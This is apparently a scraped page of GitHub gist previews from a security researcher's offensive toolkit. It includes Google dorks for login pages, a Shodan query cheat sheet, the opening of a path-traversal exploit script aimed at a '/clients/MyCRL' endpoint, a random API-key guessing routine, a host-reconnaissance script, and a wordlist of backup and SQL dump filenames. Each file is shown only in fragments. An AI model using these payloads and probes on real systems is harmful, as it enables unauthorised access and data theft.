Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| site:*/sign-in | |
| site:*/account/login | |
| site:*/forum/ucp.php?mode=login | |
| inurl:memberlist.php?mode=viewprofile | |
| intitle:"EdgeOS" intext:"Please login" | |
| inurl:user_login.php | |
| intitle:"Web Management Login" | |
| site:*/users/login_form | |
| site:*/access/unauthenticated | |
| site:account.*.*/login |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| hostname:target.com | to find all asset available for target.com on shodan | |
| http.title:"title" | to find server/host with similer title | |
| http.html:"/file" | to find server/host with similar path | |
| html:"context" | to find server/host with similar string | |
| server: "apache 2.2.3" | to find server/host with same server | |
| port:80 | to find server/host with same port | |
| os:"windows" | to find server/host with same os | |
| asn:AS3214 | to find host/server with matched asn | |
| http.status:200 | to find server/host with 200 http response code | |
| http.favicon.hash:"hash" | to find server/host with same favico hash |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| from argparse import ArgumentParser | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from colorama import Fore, Style | |
| from concurrent.futures import ThreadPoolExecutor | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| def exploit(ip, path): | |
| host = f'https://{ip}/clients/MyCRL' | |
| data = f'aCSHELL/../../../../../../../../../../..{path}' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import smtplib | |
| from email.mime.multipart import MIMEMultipart | |
| from email.mime.text import MIMEText | |
| from email.mime.base import MIMEBase | |
| from email import encoders | |
| import email.utils | |
| import google.generativeai as genai | |
| import argparse | |
| import random | |
| import requests |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import random | |
| import json | |
| import time | |
| def key_generator(): | |
| key = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' | |
| return ''.join(random.choice(key) for i in range(32)) | |
| def key_vaildator(key): | |
| try: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import os | |
| import subprocess | |
| import re | |
| Instructions = [ | |
| "Check system configuration", | |
| "Check Current logged in user", | |
| "Check if the system is running on a virtual machine", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import asyncio | |
| import multiprocessing | |
| import threading | |
| import time | |
| import requests | |
| import aiohttp | |
| import psutil | |
| from termcolor import colored | |
| from tabulate import tabulate |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import random | |
| import re | |
| from colorama import init, Fore, Back, Style | |
| from time import sleep | |
| import argparse | |
| #signature | |
| info = f"[{Fore.BLUE}INFO{Fore.RESET}]" | |
| warn = f"[{Fore.YELLOW}WARN{Fore.RESET}]" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0.1.0.sql | |
| 0.1.1.sql | |
| 0.1.2.sql | |
| 0.tar.gz | |
| 0.zip | |
| 1.sql | |
| 1.sql.7z | |
| 1.sql.bz2 | |
| 1.sql.gz | |
| 1.sql.rar |
NewerOlder